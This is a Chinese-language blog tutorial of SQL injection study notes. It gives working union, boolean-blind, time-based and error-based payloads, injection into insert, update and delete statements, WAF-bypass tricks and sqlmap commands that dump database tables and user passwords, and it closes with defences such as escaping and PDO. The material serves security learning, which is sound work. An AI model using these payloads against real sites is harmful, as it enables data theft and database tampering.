<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.8.0"><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="author" content="John Doe"><link rel="alternative" href="/atom.xml" title="木肃的博客" type="application/atom+xml"><link rel="icon" href="/favicon.png"><title>SQL注入终极版 - 木肃的博客</title><link rel="stylesheet" href="/css/main.css"><link rel="stylesheet" href="/js/fancybox/jquery.fancybox.min.css"><!--[if lt IE 9]><script>(function(a,b){a="abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output progress section summary template time video".split(" ");for(b=a.length-1;b>=0;b--)document.createElement(a[b])})()</script><![endif]--><script src="/js/jquery-3.1.1.min.js"></script><script src="/js/fancybox/jquery.fancybox.min.js"></script></head><body style="opacity:0"><header class="head"><h1 class="head-title u-fl"><a href="/">木肃的博客</a></h1><nav class="head-nav u-fr"><ul class="head-nav__list"><li class="head-nav__item"><a class="head-nav__link" href="/archives">目录</a></li></ul></nav></header><main class="main"><article class="post"><header class="post__head"> <time class="post__time" datetime="2019-01-06T13:26:41.000Z">一月 6, 2019</time><h1 class="post__title"><a href="/2019/01/06/SQL注入终极版/">SQL注入终极版</a></h1><div class="post__main echo"><blockquote>
<p>本文只是笔记整理，可能有不足之处，望大佬指出</p>
</blockquote>
<h1 id="什么是SQL注入"><a href="#什么是SQL注入" class="headerlink" title="什么是SQL注入"></a>什么是SQL注入</h1><p>所谓<strong>SQL注入</strong>，就是通过把<strong>SQL</strong>命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的<strong>SQL</strong>命令</p>
<p><strong>SQL注入原理</strong>：对用户输入过滤不严谨</p>
<p><strong>SQL注入本质</strong>：违背了<code>数据与代码分离</code>的原则</p>
<h2 id="SQL注入漏洞有两个关键条件"><a href="#SQL注入漏洞有两个关键条件" class="headerlink" title="SQL注入漏洞有两个关键条件"></a>SQL注入漏洞有两个关键条件</h2><ul>
<li>用户能控制输入的内容</li>
<li>web应用把用户输入的内容带入到数据库去执行</li>
</ul>
<p>只要满足以上两个条件，都有可能存在注入漏洞，所以，有注入的漏洞不仅仅是<code>id=1</code>这种</p>
<p>不仅仅只是select语句有注入漏洞，也要学会对update,delete,insert语句进行注入攻击</p>
<h1 id="SQL注入常见流程"><a href="#SQL注入常见流程" class="headerlink" title="SQL注入常见流程"></a>SQL注入常见流程</h1><ol>
<li>判断是否有注入</li>
<li>获取数据库信息<ol>
<li>获取数据库基本信息如:user()、database()、version()、@@basedir、@@datadir、@@tmpdir</li>
<li>获取数据库名</li>
<li>获取表名</li>
<li>获取列名</li>
<li>获取字段</li>
<li>获取用户数据</li>
</ol>
</li>
<li>破解数据</li>
<li>找后台</li>
<li>脱裤</li>
<li>跑路</li>
<li>请喝茶</li>
</ol>
<blockquote>
<p>注意:找到注入点能跑出个版本号就可以了，再往下就过分了</p>
</blockquote>
<h1 id="SQL注入常用函数"><a href="#SQL注入常用函数" class="headerlink" title="SQL注入常用函数"></a>SQL注入常用函数</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">group_concat()</span><br><span class="line"></span><br><span class="line">count()</span><br><span class="line"></span><br><span class="line">length()</span><br><span class="line"></span><br><span class="line">ascii()/ord()</span><br><span class="line"></span><br><span class="line">substr()/mid()</span><br><span class="line"></span><br><span class="line">if()</span><br><span class="line"></span><br><span class="line">sleep()/benchmark()</span><br></pre></td></tr></table></figure>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">floor()</span><br><span class="line"></span><br><span class="line">extractvalue()</span><br><span class="line"></span><br><span class="line">updatexml()</span><br><span class="line"></span><br><span class="line">geometrycollection()</span><br><span class="line"></span><br><span class="line">multipoint()</span><br><span class="line"></span><br><span class="line">polygon()</span><br><span class="line"></span><br><span class="line">multipolygon()</span><br><span class="line"></span><br><span class="line">linestring()</span><br><span class="line"></span><br><span class="line">multilinestring()</span><br><span class="line"></span><br><span class="line">exp()</span><br></pre></td></tr></table></figure>
<h1 id="SQL注入分类"><a href="#SQL注入分类" class="headerlink" title="SQL注入分类"></a>SQL注入分类</h1><h2 id="0x00-SQL注入之注入点类型判断"><a href="#0x00-SQL注入之注入点类型判断" class="headerlink" title="0x00  SQL注入之注入点类型判断"></a>0x00  SQL注入之注入点类型判断</h2><p>以下均假定注入类型为单引号注入<code>&#39;</code></p>
<h2 id="根据SQL注入的反馈类型"><a href="#根据SQL注入的反馈类型" class="headerlink" title="根据SQL注入的反馈类型"></a>根据SQL注入的反馈类型</h2><p>大致可分为显注和盲注</p>
<h3 id="基于错误显示的SQL注入"><a href="#基于错误显示的SQL注入" class="headerlink" title="基于错误显示的SQL注入"></a>基于错误显示的SQL注入</h3><p>即<a href="#报错注入">报错注入</a>，用一些特殊的报错函数去构造语句，从而达到爆数据的目的</p>
<p>详情：<a href="https://www.cnblogs.com/wocalieshenmegui/p/5917967.html" target="_blank" rel="noopener">十种MySQL报错注入</a></p>
<h3 id="union类型的联合查询注入"><a href="#union类型的联合查询注入" class="headerlink" title="union类型的联合查询注入"></a>union类型的联合查询注入</h3><p>在mysql中，有information_schema这个数据库，union注入依赖这个数据库进行，在这个数据库中，存放的是所有数据库的信息，并且是公开的，任何用户都可以访问</p>
<p>这是一张数据表：</p>
<p><img src="/sqli/union01.png" alt=""></p>
<p>union注入的一般步骤如下所示：</p>
<p><strong>order by</strong></p>
<p>原意是根据字段进行排序，在注入中，可通过它来猜总共有几个字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&apos; order by 6 #		-&gt;	正常</span><br><span class="line">&apos; order by 7 #		-&gt;	报错</span><br></pre></td></tr></table></figure>
<blockquote>
<p>注意：在数据库中，使用的是<code>#</code>，但是在url中必须把<code>#</code>编码成<code>%23</code></p>
<p>在mysql交互环境中，必须以<code>;</code>结尾，但实际注入中并不需要</p>
</blockquote>
<p><img src="/sqli/union02.png" alt=""></p>
<p>可以看到当输入的字段数大于实际值时，会报错，这里可确定有六个字段</p>
<p><strong>union select</strong></p>
<p>order by猜出字段数后，我们需要用联合查询显示出我们想要的东西，先来看看union select的用法：</p>
<p><img src="/sqli/union03.png" alt=""></p>
<p>可以看到输入的1,2,3,4,5,6都显示出来了，说明这是可控的，再来看：</p>
<p><img src="/sqli/union04.png" alt=""></p>
<p>通过输入version()等函数，可直接爆出版本等信息，<a href="#SQL注入常见流程">上面</a>的几种函数都可以使用，但是有一个问题，开发人员在写PHP连接mysql时，使用<code>mysql_fetch_assoc()</code>等类似函数，这种函数会从结果集中取出<strong>一行</strong>作为结果返回，所以虽然在数据库中能看到这个数据，但是在注入时是看不到的，这个时候就需要把前面的查询语句报错，后面的语句才能被显示，如下所示：</p>
<p>构造语句使前面报错：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id =-1&apos; union select 1,2,3,4,5,6 %23</span><br></pre></td></tr></table></figure>
<p><img src="/sqli/union05.png" alt=""></p>
<p>向下面这样，不报错</p>
<p><img src="/sqli/union06.png" alt=""></p>
<p>这样就报错了，可以看到2,3,4这三个字段被回显出来，之后就可以更改这三个字段为mysql函数进行注入</p>
<p><img src="/sqli/union07.png" alt=""></p>
<p>之后就简单了，在这里罗列下注入语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">查看所有库名</span><br><span class="line">id =-1&apos; union select 1,2,group_concat(schema_name),4,5,6 from information_schema.schemata %23</span><br><span class="line"></span><br><span class="line">查看msg数据库所有表名</span><br><span class="line">id =-1&apos; union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=0x6d7367 %23</span><br><span class="line"></span><br><span class="line">查看msg数据库user表的所有字段</span><br><span class="line">id =-1&apos; union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=0x6d7367 and table_name=0x75736572 %23</span><br><span class="line"></span><br><span class="line">查看msg数据库user表的user和pass字段</span><br><span class="line">id=-1&apos; union select 1,group_concat(username),group_concat(password),4,5,6 from users%23</span><br></pre></td></tr></table></figure>
<h3 id="布尔类型的SQL注入"><a href="#布尔类型的SQL注入" class="headerlink" title="布尔类型的SQL注入"></a>布尔类型的SQL注入</h3><p>页面有变化，但是不给出具体报错信息，即为bool盲注</p>
<p>在测注入点类型时，即可看出是否为bool盲注:</p>
<p><img src="/sqli/bool01.png" alt=""></p>
<p>加单引号</p>
<p><img src="/sqli/bool02.png" alt=""></p>
<p>bool盲注也简单</p>
<p>一般步骤是这样的，比如说要看版本号</p>
<p>先测长度：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and length(version())&gt;10 %23</span><br></pre></td></tr></table></figure>
<p>如果版本号大于10，则回显与<code>id=1</code>的回显相同，如果版本号不大于10，则回显与<code>id=1</code>不同，依据这个，使用二分法一点一点猜就可以了</p>
<p>再测每个字符：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and ascii(substr(version(),1,1))&gt;100 %23</span><br></pre></td></tr></table></figure>
<p>这段代码的意思是判断版本号的第一个字符的ascii值是否大于100</p>
<p>比如查第3个数据库的库长：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and (select length(schema_name) from information_schema.schemata limit 2,1)&gt;10 %23</span><br></pre></td></tr></table></figure>
<p>查第3个数据库名的第5个字符：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and (select ascii(substr(schema_name,5,1)) from information_schema.schemata limit 2,1)&gt;100 %23</span><br></pre></td></tr></table></figure>
<p>布尔注入比较麻烦，在实际过程中，如果检测到有bool盲注，使用SQLMAP跑就可以了。或者等到自己学会写脚本也可以自己写脚本来跑数据</p>
<h3 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>延时注入</h3><p>所谓延时注入，就是根据服务器响应时间来判断是否存在注入</p>
<p>当测注入点时发现不管怎么测页面都没反应，那就可以在测试语句中加入sleep(n)函数测试，比如sqli-labs第9关</p>
<p><img src="/sqli/time01.png" alt=""></p>
<p><img src="/sqli/time02.png" alt=""></p>
<p>测版本长度：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and if(length(version())&gt;10,sleep(5),0) %23</span><br></pre></td></tr></table></figure>
<p>如果版本长度大于10页面就会响应5s以上</p>
<p>注入语句</p>
<p>测版本第一个字符：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and if(ascii(mid(version(),1,1))&gt;100,sleep(5),0)%23</span><br></pre></td></tr></table></figure>
<p>测第3个数据库长度：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and if((select length(schema_name) from information_schema.schemata limit 0,1)&gt;5,sleep(5),0)%23</span><br></pre></td></tr></table></figure>
<p>测第5个数据库的第12个字符：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos; and if((select ascii(substr(schema_name,12,1)) from information_schema.schemata)&gt;79,sleep(5),0)</span><br></pre></td></tr></table></figure>
<p>基本步骤就这样，多练，就会了，这里有两个点需要注意：</p>
<ol>
<li><p>在select语句中，请使用and不要使用or，使用or前提是把前面参数弄一个不存在的，其次mysql后匹配所有的结果然后进行sleep(5)，所以时间会很长，亲身示范给你们：</p>
<p><img src="/sqli/time03.png" alt=""></p>
</li>
<li><p>在if语句中，第三个参数是可以随便写的，但是建议写<code>0</code>，因为<code>0</code>可以代表bool假，如果条件判断不正确，就会返回第三个参数，即<code>0</code>，可以避免很多情况，尤其是在后面的增删改语句中尤为明显</p>
</li>
</ol>
<h2 id="根据SQL语句的类型"><a href="#根据SQL语句的类型" class="headerlink" title="根据SQL语句的类型"></a>根据SQL语句的类型</h2><h3 id="select"><a href="#select" class="headerlink" title="select"></a>select</h3><p>select用于从数据库中选取数据</p>
<h3 id="insert"><a href="#insert" class="headerlink" title="insert"></a>insert</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">insert into messages (title,message,......) values (&apos;hello&apos;,&apos;123&apos;,......);</span><br><span class="line"></span><br><span class="line">insert into messages (title,message,time,content,author) values (&apos;hello&apos;,&apos;123&apos;,&apos;2018&apos;,&apos;123&apos;,&apos;admin&apos; );</span><br></pre></td></tr></table></figure>
<p>对insert语句注入非常简单，只需根据语句特点进行构造出一个正常的语句即可</p>
<p>比如上面的语句,对<code>message</code>字段进行注入攻击，可以这样构造：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">insert into messages (title,message,time,content,author) values</span><br><span class="line">(&apos;hello&apos;，&apos;msg&apos;,1,1,1)#&apos;)</span><br></pre></td></tr></table></figure>
<p>在上述语句中，你的payload是长这样的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msg&apos;,1,1,1)#</span><br></pre></td></tr></table></figure>
<p>在实际环境中，我们并不知道有多少个字段，所以就需要一个一个的尝试，只要我们注入攻击的这个字段不在最后一个，就可以完成注入</p>
<p>在后续注入中，只需把<code>1</code>转换为要注入的语句即可</p>
<h3 id="update"><a href="#update" class="headerlink" title="update"></a>update</h3><p>update语句一般都是延时注入，不过其他注入也有可能出现，延时注入可以保证语句不被执行</p>
<p>有个特别需要注意的地方：</p>
<p>​    <strong>不要使用<code>&#39; #</code>或<code>&quot; #</code>来执行SQL语句，因为这样会造成所有记录全被执行更新操作，想象一下如果是修改密码时有这个注入，直接全站所有密码被改</strong></p>
<p>​    还有就是update语句一般是在where字句之前，所以构造的注入语句中需要带上where子句</p>
<p>update语句长这样：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">update users set pass = &apos;123456&apos; where name = &apos;user&apos;;</span><br></pre></td></tr></table></figure>
<p>这样测试：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.	123&apos;</span><br><span class="line">2.	123&apos; where sleep(2) #</span><br></pre></td></tr></table></figure>
<p>sleep()函数返回结果为0，所以条件永假，不会执行update操作</p>
<p>但是这样有一个弊端，当where返回false后，mysql回去检索每一个语句，从而执行时间就是<code>记录数*sleep时间</code></p>
<p><img src="/sqli/update01.png" alt=""></p>
<p>所以语句可以这样改进一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123&apos; where id = 100 and sleep(2)#</span><br></pre></td></tr></table></figure>
<p>增加一个限制条件</p>
<p>但是又有一个问题，就是前提条件是此网站有<code>id</code>这个字段，并且你能猜到值，如果实在猜不到，那就使用上面的语句直接sleep吧，记得把sleep时间改小点。benchmark函数好像不会和前面的列数相乘，但是会消耗网站所在服务器资源，不太好，也很危险，慎用</p>
<p>如果存在注入，那就把sleep()替换成注入语句执行就可以了</p>
<p>注入语句长这样：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123&apos; where id=7100 and if(length(version())&gt;5,sleep(3),0)#</span><br></pre></td></tr></table></figure>
<h3 id="delete"><a href="#delete" class="headerlink" title="delete"></a>delete</h3><p>这个语句和update一样，都是高危语句，在进行注入的时候，一定要在本地测试好语句，没问题了再进行注入</p>
<p>delete语句同样也需要注意几个点</p>
<ol>
<li><strong>不要使用<code>&#39; #</code>或<code>&quot; #</code>来执行SQL语句</strong></li>
<li><strong>if语句的返回结果一定要为0</strong>，也就是说if的第2,3个参数的结果一定要为0，如果不为0导致语句被执行，误删了机密文件，那你倒是能获得一杯普洱茶</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">delete from users where  id = &apos;57&apos; and title = &apos;qwerdf&apos;;</span><br></pre></td></tr></table></figure>
<p>这两个点都有可能是让用户操作的点，假设让我们输入title，那么测试顺序：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">qwer&apos;</span><br><span class="line"></span><br><span class="line">请一定要跳过:`qwer&apos;#`这一步，把where条件注释掉，你是要删库跑路吗？？？</span><br><span class="line"></span><br><span class="line">qwer&apos; and sleep(3)#</span><br></pre></td></tr></table></figure>
<p>如果不想真的删除一条数据，就可以使用时间延时盲注，注意if语句返回结果一定要都是0</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qwer&apos; and if(length(version())&gt;5,sleep(3),0) #</span><br></pre></td></tr></table></figure>
<p>如果数据足够多，就用布尔盲注，这样比较快</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qwer&apos; and length(version())&gt;5 #</span><br></pre></td></tr></table></figure>
<h2 id="根据业务类型点进行分类"><a href="#根据业务类型点进行分类" class="headerlink" title="根据业务类型点进行分类"></a>根据业务类型点进行分类</h2><h3 id="登录"><a href="#登录" class="headerlink" title="登录"></a>登录</h3><p>首先，登录一般在成功后都会跳转，所以最好的注入方式就是延时注入</p>
<p>并且密码基本上都是经过加密的，所以能注入的地方也就只有用户名的地方</p>
<p>登录处的处理方式目前我知道的有两种：</p>
<ol>
<li><p>select直接查询用户名和密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users where user=&apos;tom&apos; and pass=&apos;hello&apos;;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>但是有一个问题，<strong>如果用户名不存在</strong>，语句直接为假，就不执行后面的语句了，所以在进行测试之前，可以先注册一个，然后拿注册的用户去测试就不用考虑这个问题了</p>
<ol start="2">
<li>select只查询用户名，然后拿用户输入的密码和数据库中该用户的密码作比对</li>
</ol>
<p><img src="/sqli/login01.png" alt=""></p>
<p>两种逻辑在注入时没区别，只不过第二种万能密码绕不过去</p>
<p>注入语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tom&apos; and sleep(3)</span><br></pre></td></tr></table></figure>
<p>就尝试以下看能不能睡就可以了</p>
<h3 id="注册"><a href="#注册" class="headerlink" title="注册"></a>注册</h3><p>注册功能通过<code>select</code>+<code>insert</code>语句完成操作</p>
<p>先查询输入的用户名是否存在，如果不存在则创建此用户</p>
<p><img src="/sqli/reg01.png" alt=""></p>
<p>像上图中可以这样绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user&apos;,version())#</span><br></pre></td></tr></table></figure>
<p>但是因为只有两个字段，version()被保存在了密码字段中，所以没什么用</p>
<p>上图逻辑可以这样注入：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin&apos; and sleep(5)#</span><br></pre></td></tr></table></figure>
<p>首先要保证前面的用户存在，直接对select语句进行注入</p>
<h3 id="留言"><a href="#留言" class="headerlink" title="留言"></a>留言</h3><p><img src="/sqli/select.png" alt=""></p>
<p>像上图中可以这样绕过</p>
<p>在留言内容处写语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;,1,1)#</span><br></pre></td></tr></table></figure>
<p>留言板中能够填写的只有标题和内容两个字段，在我们提交留言时，系统会自动添加上作者，时间字段，所以只要绕过这两个字段就可以进行注入了</p>
<h3 id="删除留言"><a href="#删除留言" class="headerlink" title="删除留言"></a>删除留言</h3><p><img src="/sqli/delete.png" alt=""></p>
<p>上图的绕过可以这样写</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and if(length(version())&gt;5,sleep(3),0) #&apos;</span><br></pre></td></tr></table></figure>
<h2 id="图片上传"><a href="#图片上传" class="headerlink" title="图片上传"></a>图片上传</h2><p>一般图片上传的地方都只是对文件上传漏洞进行了限制，可能限制了文件格式，或者文件内容，但是开发者有时不会想到图片上传的位置有时也可以用来进行注入，把文件的名字修改成SQL语句，在把图片名字存入到数据库中时就会执行SQL语句</p>
<h2 id="根据数据库类型不同的分类"><a href="#根据数据库类型不同的分类" class="headerlink" title="根据数据库类型不同的分类"></a>根据数据库类型不同的分类</h2><h3 id="mysql数据库注入"><a href="#mysql数据库注入" class="headerlink" title="mysql数据库注入"></a>mysql数据库注入</h3><h3 id="access数据库注入"><a href="#access数据库注入" class="headerlink" title="access数据库注入"></a>access数据库注入</h3><h3 id="mssql数据库注入"><a href="#mssql数据库注入" class="headerlink" title="mssql数据库注入"></a>mssql数据库注入</h3><h3 id="Oracle数据库注入"><a href="#Oracle数据库注入" class="headerlink" title="Oracle数据库注入"></a>Oracle数据库注入</h3><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><h3 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h3><p>前提：数据库编码格式为’gbk’/‘gb2312’等</p>
<p>这种漏洞多存在与Windows系统中</p>
<p>%80-%df,只能通过工具注入，因为直接输入%会被编码</p>
<p>utf8 没有宽字节注入  ，因为没有5c结尾的编码  %5c-&gt;/</p>
<h3 id="二次解码注入"><a href="#二次解码注入" class="headerlink" title="二次解码注入"></a>二次解码注入</h3><p>漏洞成因：addslashes()函数在urlencode函数之前使用</p>
<p>黑盒测试是测试不出来的，一般是进行白盒测试代码审计时才会找到这个注入点，要是遇到开源的就去Github上找找源码审计一下。</p>
<h1 id="SQL注入之waf绕过"><a href="#SQL注入之waf绕过" class="headerlink" title="SQL注入之waf绕过"></a>SQL注入之waf绕过</h1><p>想要绕waf就要先知道waf是什么</p>
<h2 id="什么是waf"><a href="#什么是waf" class="headerlink" title="什么是waf"></a>什么是waf</h2><p>web应用防护系统，也称网站应用级入侵防御系统。英文叫做Web Application Firewall,简称叫waf。主要是对web特有的入侵方式加强防护，如DDOS防护，SQL注入、XML注入、XSS等</p>
<p>waf也有很多的种类：代码waf、软件waf、硬件waf、云waf等等</p>
<p>了解了什么是waf，那应该怎么绕过呢？</p>
<h2 id="SQL注入绕waf常用方式"><a href="#SQL注入绕waf常用方式" class="headerlink" title="SQL注入绕waf常用方式"></a>SQL注入绕waf常用方式</h2><p>1、大小写混合    uNIoN sELecT 1,2,3,4</p>
<p>2、替换关键字    selselsectect 1,2,3,4</p>
<p>3、使用编码        %55nion%53elect 1,2,3,4</p>
<p>4、使用注释        union /**/select 1,2,3,4</p>
<p>5、等价函数与命令  @@datadir ==&gt; datadir()</p>
<p>6、特殊符号        select+id+from users</p>
<h1 id="工具的使用"><a href="#工具的使用" class="headerlink" title="工具的使用"></a>工具的使用</h1><h2 id="SQLMAP"><a href="#SQLMAP" class="headerlink" title="SQLMAP"></a>SQLMAP</h2><p>以下命令是在windows环境中使用sqlmap，在kali中的使用和windows中差不多</p>
<p>首先要去Github中下载一个sqlmap，解压出来后在sqlmap的文件夹下打开cmd窗口</p>
<p>对了，还要有Python环境哦，还要是Python2的环境</p>
<p>打开sqlmap：python sqlmap.py</p>
<p>扫描网站：python sqlmap.py –url <a href="http://192.168.11.86/index.php?id=1" target="_blank" rel="noopener">http://192.168.11.86/index.php?id=1</a></p>
<p>-v参数，7个等级0-6</p>
<p>0、只显示Python错误以及严重的信息</p>
<p>1、同时显示基本信息和警告信息</p>
<p>2、同时显示debug信息</p>
<p>3、同时显示注入的payload</p>
<p>4、同时显示HTTP请求</p>
<p>5、同时显示HTTP响应头</p>
<p>6、同时显示HTTP响应页面</p>
<p>常规步骤</p>
<p>判断是否有注入</p>
<p>sqlmap -u <a href="http://192.168.11.86/index.php?id=1" target="_blank" rel="noopener">http://192.168.11.86/index.php?id=1</a></p>
<p>查看数据库</p>
<p>sqlmap -u <a href="http://192.168.11.86/index.php?id=1" target="_blank" rel="noopener">http://192.168.11.86/index.php?id=1</a> –dbs</p>
<p>查看当前使用的数据库</p>
<p>sqlmap -u <a href="http://192.168.11.86/index.php?id=1" target="_blank" rel="noopener">http://192.168.11.86/index.php?id=1</a> –current-db</p>
<p>查看数据表</p>
<p>sqlmap -u <a href="http://192.168.11.86/index.php?id=1" target="_blank" rel="noopener">http://192.168.11.86/index.php?id=1</a> -D 数据库名 –tables</p>
<p>查看列名</p>
<p>sqlmap -u <a href="http://192.168.11.86/index.php?id=1" target="_blank" rel="noopener">http://192.168.11.86/index.php?id=1</a> -D 数据库名 -T 表名 –columns</p>
<p>查看数据</p>
<p>sqlmap -u <a href="http://192.168.11.86/index.php?id=1" target="_blank" rel="noopener">http://192.168.11.86/index.php?id=1</a> -D 数据库名 -T 表名 –dump</p>
<p>常规的操作就是这些，以后会单独写一篇关于sqlmap使用的博客</p>
<h1 id="防御SQL注入"><a href="#防御SQL注入" class="headerlink" title="防御SQL注入"></a>防御SQL注入</h1><p>1、GPC/RUNTIME魔术引导</p>
<p>通常数据污染有两种方式：一种是应用被动接受参数，像GET、POST等。一种是主动获取参数类似读取远程页面或者文件等，所以防SQL注入的方法就是守住这两条路</p>
<p>magic_quotes_gpc负责对GET、POST、COOKIE的值进行过滤</p>
<p>magic_quotes_runtime对从数据库或者文件中获取的数据进行过滤</p>
<p>2、过滤函数和类</p>
<p>在通常的工作场景中，用的多的还是过滤函数和类。不过单纯的过滤函数还是不够严谨，也会出现绕过的情况。这时候可以使用预编译语句来绑定变量</p>
<p>常用过滤函数：</p>
<p>addslashes函数</p>
<p>mysql[real]escape_string函数</p>
<p>intval等字符转换</p>
<p>3、还有终极方法，那就是</p>
<h2 id="网站重写，给我用PDO！！！"><a href="#网站重写，给我用PDO！！！" class="headerlink" title="网站重写，给我用PDO！！！"></a>网站重写，给我用PDO！！！</h2></div></header></article><div class="comments" id="lv-container" data-id="city" data-uid="your uid"><script>(function(d, s) {var j, e = d.getElementsByTagName(s)[0];if (typeof LivereTower === 'function') { return; } j = d.createElement(s);j.src = 'https://cdn-city.livere.com/js/embed.dist.js';j.async = true;e.parentNode.insertBefore(j, e);})(document, 'script');</script></div></main><footer class="foot"><div class="foot-copy">&copy; 2016-2019 John Doe</div></footer><script src="/js/scroller.js"></script><script src="/js/main.js"></script></body></html>